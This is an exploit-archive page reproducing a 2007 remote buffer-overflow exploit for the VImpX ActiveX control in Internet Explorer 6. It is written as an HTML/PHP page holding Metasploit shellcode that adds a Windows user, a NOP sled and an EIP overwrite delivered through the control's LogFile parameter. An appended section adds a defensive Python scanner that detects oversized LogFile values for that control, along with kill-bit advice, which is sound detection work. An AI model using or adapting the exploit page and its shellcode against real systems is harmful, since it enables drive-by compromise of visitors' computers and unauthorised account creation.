vimp-overflow.txt

17 May 2007 | Reported by rgod | Type: packetstorm | Source: packetstormsecurity.com

Remote buffer overflow exploit in VImpX ActiveX (VImpX.ocx v. 4.7.3.0) for Windows XP SP2 IT version


Code
`<!--
IE 6 / DB Software Laboratory VImpX ActiveX (VImpX.ocx v. 4.7.3.0)
remote buffer overflow exploit
windows xp sp2 it version / eip overwrite method
by rgod
site: http://retrogod.altervista.org
mail: retrog at alice dot it

software site: http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53
-->
<html>  
<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='VImpAX1'>  
<?php  
/* win32_adduser - PASS=tzu EXITFUNC=seh USER=sun Size=483 Encoder=PexAlphaNum http://metasploit.com */  
$shellcode =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".  
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x57".  
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x48".  
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x43\x4b\x38".  
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".  
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x58".  
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54".  
"\x4b\x38\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".  
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43".  
"\x42\x4c\x46\x46\x4b\x58\x42\x44\x42\x33\x45\x48\x42\x4c\x4a\x57".  
"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x41\x4d\x4a".  
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b".  
"\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x53".  
"\x48\x4f\x42\x36\x48\x55\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x47".  
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x46\x4a\x49".  
"\x50\x4f\x4c\x38\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x4d\x56".  
"\x46\x36\x50\x32\x45\x46\x4a\x47\x45\x56\x42\x52\x4f\x52\x43\x36".  
"\x42\x52\x50\x46\x45\x56\x46\x47\x42\x52\x45\x47\x43\x37\x45\x56".  
"\x44\x57\x42\x42\x43\x57\x45\x47\x50\x56\x42\x52\x46\x47\x4c\x37".  
"\x45\x47\x42\x52\x4f\x42\x41\x34\x46\x34\x46\x54\x42\x42\x48\x42".  
"\x48\x32\x42\x52\x50\x46\x45\x36\x46\x57\x42\x52\x4e\x46\x4f\x36".  
"\x43\x56\x41\x46\x4e\x36\x47\x56\x44\x47\x4f\x36\x45\x57\x42\x37".  
"\x42\x52\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56\x49\x36\x43\x37".  
"\x46\x47\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37\x43\x37\x42\x52".  
"\x43\x57\x45\x57\x50\x46\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54".  
"\x42\x50\x5a";  
$junk = "\x45\x45\x45\x59";  
$eip = "\x2d\xd1\xe0\x77"; // call eax user32.dll  
$exploit= str_repeat("\x90",268).$eip.$junk."\x90\x90\x90\x0d\x01".str_repeat("\x90",16).$shellcode.str_repeat("\x90",9999);  
echo "<param name=\"LogFile\" value=\"$exploit\"/>";  
?>  
</object>  
</html>  
`
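
A defender's check for the pattern this exploit relies on, as an added example that is not part of the original exploit or of any vendor tooling: it scans served HTML for an `<object>` with the VImpX CLSID whose `LogFile` param is longer than a file path could be. The 260-character threshold (Windows MAX_PATH) and the names `VImpXScanner` and `scan_html` are assumptions; the CLSID, the parameter name and the 268-byte figure come from the code above.

```python
from html.parser import HTMLParser

# CLSID and parameter name taken from the exploit page above.
VIMPX_CLSID = "clsid:7600707b-9f47-416d-8ab5-6fd96ea37968"
# Assumption: a real log file path fits in Windows MAX_PATH (260 chars);
# the exploit above places 268 filler bytes before the return address.
MAX_LOGFILE_LEN = 260


class VImpXScanner(HTMLParser):
    """Collects findings for VImpX <object> tags with an oversized LogFile."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_vimpx = False   # True while inside a VImpX <object>
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self.in_vimpx = a.get("classid", "").strip().lower() == VIMPX_CLSID
        elif tag == "param" and self.in_vimpx:
            value = a.get("value", "")
            if a.get("name", "").lower() == "logfile" and len(value) > MAX_LOGFILE_LEN:
                self.findings.append({"line": self.getpos()[0], "length": len(value)})

    def handle_endtag(self, tag):
        if tag == "object":
            self.in_vimpx = False


def scan_html(html):
    """Return a list of findings (possibly empty) for one HTML document."""
    scanner = VImpXScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples (not captured traffic): filler characters only, no payload.
SUSPICIOUS = ("<html>\n<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='x'>\n"
              '<param name="LogFile" value="' + "A" * 300 + '"/>\n</object></html>')
BENIGN = ("<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968'>"
          '<param name="LogFile" value="C:\\logs\\import.log"/></object>')

if __name__ == "__main__":
    print(scan_html(SUSPICIOUS))
    print(scan_html(BENIGN))
```

The same test fits a proxy or mail-gateway content filter; on endpoints, setting the kill bit for this CLSID stops Internet Explorer from instantiating the control at all.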

Vulners AI Score: 7.4 (High risk)